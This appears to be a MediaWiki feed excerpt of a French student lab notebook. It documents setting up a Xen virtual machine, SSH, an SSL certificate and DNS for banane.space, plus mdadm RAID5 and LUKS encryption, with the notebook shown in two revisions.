Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46205</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46205"/>
				<updated>2017-11-13T10:46:47Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
